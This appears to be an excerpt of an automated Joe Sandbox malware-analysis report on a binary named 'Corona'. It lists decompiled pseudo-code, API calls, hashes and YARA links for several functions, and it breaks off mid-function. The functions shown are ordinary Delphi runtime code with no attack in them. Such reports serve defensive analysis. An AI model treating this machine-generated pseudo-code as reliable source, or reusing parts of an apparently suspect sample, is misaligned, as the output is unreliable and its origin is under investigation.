                                  • Opcode ID: e0b1492e885012949cb2e2ca8e3c8bbe24ed9413439b0ae5a9611b3848af67fb
                                  • Instruction ID: db26740a08f61d6a1bf2e46ee5bbf816a71ff31406259d8a1beaac8910231981
                                  • Opcode Fuzzy Hash: e0b1492e885012949cb2e2ca8e3c8bbe24ed9413439b0ae5a9611b3848af67fb
                                  • Instruction Fuzzy Hash: 9EF0BFB16401009BDF00FFBADDC7A4777989F083097004456B905DF197C67DE8518739
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405A9D, Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405A9D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x4525b8)) =  *((intOrPtr*)(__eax - 0x4525b8)) + __eax - 0x4525b8;
				 *0x450008 = 2;
				 *0x452014 = 0x4011fc;
				 *0x452018 = 0x401204;
				 *0x45204a = 2;
				 *0x452000 = E00404C18;
				if(E00402F44() != 0) {
					_t3 = E00402F74();
				}
				E00403038(_t3);
				 *0x452050 = 0xd7b0;
				 *0x45221c = 0xd7b0;
				 *0x4523e8 = 0xd7b0;
				 *0x45203c = GetCommandLineA();
				 *0x452038 = E0040130C();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x4525bc = E004059D4(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x4525bc = E004059D4(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x4525bc = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x452030 = _t11;
				return _t11;
			}





                                  0x00405a9d
                                  0x00405aa2
                                  0x00405aa7
                                  0x00405aa9
                                  0x00405ab0
                                  0x00405aba
                                  0x00405ac4
                                  0x00405acb
                                  0x00405adc
                                  0x00405ade
                                  0x00405ade
                                  0x00405ae3
                                  0x00405ae8
                                  0x00405af1
                                  0x00405afa
                                  0x00405b08
                                  0x00405b12
                                  0x00405b26
                                  0x00405b5f
                                  0x00405b28
                                  0x00405b36
                                  0x00405b4e
                                  0x00405b38
                                  0x00405b38
                                  0x00405b38
                                  0x00405b36
                                  0x00405b64
                                  0x00405b69
                                  0x00405b6e

                                  APIs
                                    • Part of subcall function 00402F44: GetKeyboardType.USER32(00000000), ref: 00402F49
                                    • Part of subcall function 00402F44: GetKeyboardType.USER32(00000001), ref: 00402F55
                                  • GetCommandLineA.KERNEL32 ref: 00405B03
                                  • GetVersion.KERNEL32 ref: 00405B17
                                  • GetVersion.KERNEL32 ref: 00405B28
                                  • GetCurrentThreadId.KERNEL32 ref: 00405B64
                                    • Part of subcall function 00402F74: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F96
                                    • Part of subcall function 00402F74: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FC9
                                    • Part of subcall function 00402F74: RegCloseKey.ADVAPI32(?,00402FEC,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FDF
                                  • GetThreadLocale.KERNEL32 ref: 00405B44
                                    • Part of subcall function 004059D4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00405A3A), ref: 004059FA
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                  • String ID:
                                  • API String ID: 3734044017-0
                                  • Opcode ID: b3fbfd6a88ff54c3af26434b01ebe3ae0079439209388d3db7d043bac674a12c
                                  • Instruction ID: 48a128f339e3af2d8d715bf7417d2a7053d639c943ef1a06fe3e216bf9e22b1a
                                  • Opcode Fuzzy Hash: b3fbfd6a88ff54c3af26434b01ebe3ae0079439209388d3db7d043bac674a12c
                                  • Instruction Fuzzy Hash: 760161A580574299EB10BF72AA553563A60AB1330AF10407FD640BA2F3E7FC9145DF6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B5CC, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0040B5CC(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40b787);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x450fd0; // 0x406aa4
					E0040597C(_t52,  &_v8);
				} else {
					_t86 =  *0x451130; // 0x406a9c
					E0040597C(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x450fdc; // 0x406a4c
					E0040597C(_t60,  &_v372);
					E0040B1F4(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040BC( &_v340, 0x105,  &_v297);
					E00408140(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x45103c; // 0x406b44
					E0040597C(_t82,  &_v344);
					E0040B1F4(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040B78E);
				E00403E4C( &_v372);
				E00403E70( &_v344, 3);
				return E00403E4C( &_v8);
			}

































                                  0x0040b5cc
                                  0x0040b5d9
                                  0x0040b5df
                                  0x0040b5e5
                                  0x0040b5eb
                                  0x0040b5f1
                                  0x0040b5f6
                                  0x0040b5f7
                                  0x0040b5fc
                                  0x0040b5ff
                                  0x0040b605
                                  0x0040b60c
                                  0x0040b620
                                  0x0040b625
                                  0x0040b60e
                                  0x0040b611
                                  0x0040b616
                                  0x0040b616
                                  0x0040b62a
                                  0x0040b637
                                  0x0040b643
                                  0x0040b6ff
                                  0x0040b705
                                  0x0040b70f
                                  0x0040b715
                                  0x0040b71c
                                  0x0040b722
                                  0x0040b738
                                  0x0040b73d
                                  0x0040b74f
                                  0x0040b666
                                  0x0040b669
                                  0x0040b66f
                                  0x0040b687
                                  0x0040b698
                                  0x0040b6a3
                                  0x0040b6a9
                                  0x0040b6b3
                                  0x0040b6b9
                                  0x0040b6c0
                                  0x0040b6c6
                                  0x0040b6dc
                                  0x0040b6e1
                                  0x0040b6f3
                                  0x0040b6f8
                                  0x0040b758
                                  0x0040b75b
                                  0x0040b75e
                                  0x0040b769
                                  0x0040b779
                                  0x0040b786

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040B787), ref: 0040B637
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040B787), ref: 0040B659
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: Dk@$Lj@$ps@
                                  • API String ID: 902310565-4243004233
                                  • Opcode ID: bd1403319e8bfbc1db224c7305b3ba40fb4844939c798b0a1795ddff716335bf
                                  • Instruction ID: 49e01914331b003dba712245535bc4eaaf39a7e01c166723ba37cb5f8d7efa30
                                  • Opcode Fuzzy Hash: bd1403319e8bfbc1db224c7305b3ba40fb4844939c798b0a1795ddff716335bf
                                  • Instruction Fuzzy Hash: 29410870900658DFDB60DF69CC81BDAB7F4EB48304F4040EAE908AB291D7789E84CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AF68, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040AF68(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x452664; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040AF5C(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E004082D4( &_v273, 0x104, E0040BF80(0x5c) + 1);
				_t74 = 0x40b0e8;
				_t86 = 0x40b0e8;
				_t83 =  *0x406cc4; // 0x406d10
				if(E00403288(_t87, _t83) != 0) {
					_t74 = E0040430C( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00408270(_t74, 0x40b0e8);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40b0ec;
					}
				}
				_t51 =  *0x4510f4; // 0x406a74
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x452664; // 0x400000
				LoadStringA(E00404EE8(_t53),  *_t16,  &_v790, 0x100);
				E0040304C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E004088F8(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00408270(_v8, _t86);
			}































                                  0x0040af68
                                  0x0040af74
                                  0x0040af77
                                  0x0040af79
                                  0x0040af85
                                  0x0040af94
                                  0x0040afbe
                                  0x0040afc4
                                  0x0040afd0
                                  0x0040afd5
                                  0x0040afdb
                                  0x0040afdb
                                  0x0040aff9
                                  0x0040affe
                                  0x0040b003
                                  0x0040b00a
                                  0x0040b017
                                  0x0040b021
                                  0x0040b025
                                  0x0040b02c
                                  0x0040b035
                                  0x0040b035
                                  0x0040b02c
                                  0x0040b046
                                  0x0040b04b
                                  0x0040b04f
                                  0x0040b05a
                                  0x0040b067
                                  0x0040b072
                                  0x0040b078
                                  0x0040b085
                                  0x0040b08b
                                  0x0040b095
                                  0x0040b09b
                                  0x0040b0a2
                                  0x0040b0a8
                                  0x0040b0af
                                  0x0040b0b5
                                  0x0040b0d1
                                  0x0040b0e4

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AF85
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AFA9
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AFC4
                                  • LoadStringA.USER32 ref: 0040B05A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: tj@
                                  • API String ID: 3990497365-1165482787
                                  • Opcode ID: b091abca5cb63712d51e5744eb9559b473fa3e6cd5b0578424242ea3974542d5
                                  • Instruction ID: 2a6a6bb71484bad2caa5c58cb7ab985c6530a2227addd48874c4b6061fea0095
                                  • Opcode Fuzzy Hash: b091abca5cb63712d51e5744eb9559b473fa3e6cd5b0578424242ea3974542d5
                                  • Instruction Fuzzy Hash: 30412070A003589BDB21DB69CD85BDAB7BC9B08305F4040FAE548F7292D7789F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AF66, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040AF66(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x452664; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040AF5C(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E004082D4( &_v273, 0x104, E0040BF80(0x5c) + 1);
				_t75 = 0x40b0e8;
				_t89 = 0x40b0e8;
				_t85 =  *0x406cc4; // 0x406d10
				if(E00403288(_t92, _t85) != 0) {
					_t75 = E0040430C( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00408270(_t75, 0x40b0e8);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40b0ec;
					}
				}
				_t51 =  *0x4510f4; // 0x406a74
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x452664; // 0x400000
				LoadStringA(E00404EE8(_t53),  *_t16,  &_v790, 0x100);
				E0040304C( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E004088F8(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00408270(_v8, _t89);
			}































                                  0x0040af74
                                  0x0040af77
                                  0x0040af79
                                  0x0040af85
                                  0x0040af94
                                  0x0040afbe
                                  0x0040afc4
                                  0x0040afd0
                                  0x0040afd5
                                  0x0040afdb
                                  0x0040afdb
                                  0x0040aff9
                                  0x0040affe
                                  0x0040b003
                                  0x0040b00a
                                  0x0040b017
                                  0x0040b021
                                  0x0040b025
                                  0x0040b02c
                                  0x0040b035
                                  0x0040b035
                                  0x0040b02c
                                  0x0040b046
                                  0x0040b04b
                                  0x0040b04f
                                  0x0040b05a
                                  0x0040b067
                                  0x0040b072
                                  0x0040b078
                                  0x0040b085
                                  0x0040b08b
                                  0x0040b095
                                  0x0040b09b
                                  0x0040b0a2
                                  0x0040b0a8
                                  0x0040b0af
                                  0x0040b0b5
                                  0x0040b0d1
                                  0x0040b0e4

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AF85
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040AFA9
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040AFC4
                                  • LoadStringA.USER32 ref: 0040B05A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: tj@
                                  • API String ID: 3990497365-1165482787
                                  • Opcode ID: 25e1ce31c232b2c391fb264439be15b96259eb47e4e9e1fd0a8f35ddb661912e
                                  • Instruction ID: 14794c9657d7e157509dfb227f0053361b409bfa3ba5a1be76eb5f9c0a6d41bd
                                  • Opcode Fuzzy Hash: 25e1ce31c232b2c391fb264439be15b96259eb47e4e9e1fd0a8f35ddb661912e
                                  • Instruction Fuzzy Hash: A1411F70A003589BDB21DB69CD85BDAB7BC9B08305F4440FAA548F7292DB789F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044190C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0044190C(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x45112c; // 0x452740
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00441C90(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00441C90(_t29) & 0x0000007f) << 0x0000000d) + ((E00441C90(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}









                                  0x0044190e
                                  0x00441911
                                  0x00441913
                                  0x0044191c
                                  0x00441933
                                  0x00441935
                                  0x0044193c
                                  0x00441948
                                  0x0044194c
                                  0x0044195a
                                  0x00441961
                                  0x00441965
                                  0x00441977
                                  0x0044197c
                                  0x0044199a
                                  0x0044199e
                                  0x004419ac
                                  0x004419b3
                                  0x00000000
                                  0x004419b9
                                  0x004419b3
                                  0x0044197c
                                  0x00441961
                                  0x004419c6

                                  APIs
                                  • GetMenuItemInfoA.USER32 ref: 0044195A
                                  • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004419AC
                                  • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004419B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$InfoItem$Draw
                                  • String ID: @'E$P
                                  • API String ID: 3227129158-1340524458
                                  • Opcode ID: 19148a3e3cff468209702d2579602675a742050a8348269eeda0cab944079672
                                  • Instruction ID: 3ddb2fd4f838cd13f267d1ccc0321f192132310a35351720ce2d8d6c73b89ee1
                                  • Opcode Fuzzy Hash: 19148a3e3cff468209702d2579602675a742050a8348269eeda0cab944079672
                                  • Instruction Fuzzy Hash: 111182703052015FE3109F29CC85B5B76D8AB85355F148669F0A4DB3EAD779C894C789
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402F74, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00402F74() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x450020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x450020; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x450020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FE5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x402fec);
					return RegCloseKey(_v8);
				}
			}












                                  0x00402f75
                                  0x00402f77
                                  0x00402f81
                                  0x00402f9d
                                  0x00402fec
                                  0x00402ffe
                                  0x00403001
                                  0x0040300a
                                  0x00402f9f
                                  0x00402fa1
                                  0x00402fa2
                                  0x00402fa7
                                  0x00402faa
                                  0x00402fad
                                  0x00402fc9
                                  0x00402fd0
                                  0x00402fd3
                                  0x00402fd6
                                  0x00402fe4
                                  0x00402fe4

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402F96
                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FC9
                                  • RegCloseKey.ADVAPI32(?,00402FEC,00000000,?,00000004,00000000,00402FE5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  • Opcode ID: 8cdc6f3d9ce9be6ccd775c9ddf3624abd7275d465d7f04bf4c3c3197e80d43ec
                                  • Instruction ID: 79a8500c38d6b94a54a844a0eed5da9113a6d7aeac67bba0153ab5a8a25ccdab
                                  • Opcode Fuzzy Hash: 8cdc6f3d9ce9be6ccd775c9ddf3624abd7275d465d7f04bf4c3c3197e80d43ec
                                  • Instruction Fuzzy Hash: 8E017579A40309BADB11DB90DD42FAE77BCEB08B05F5001B7B900F65D1E6799A10D75C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043E6BC, Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0043E6BC(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x43e8a0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E00440654(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E00441C90(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00403EE4( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404258(_v16, 0x43e8c4);
					if(_t153 != 0) {
						E0041CD14( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041C6EC( *((intOrPtr*)(_v8 + 0xc))) |  *0x43e8c8;
							E0041C6F8( *((intOrPtr*)(_v8 + 0xc)), E0041C6EC( *((intOrPtr*)(_v8 + 0xc))) |  *0x43e8c8, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E0040410C(_v16);
							_t65 = E0040430C(_v16);
							DrawTextA(E0041D2CC(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x43e8a7);
							return E00403E4C( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041C42C( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E0040410C(_v16);
								_t91 = E0040430C(_v16);
								DrawTextA(E0041D2CC(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041C42C( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E0041BF6C(0xff00000d);
								_t78 = E0041BF6C(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
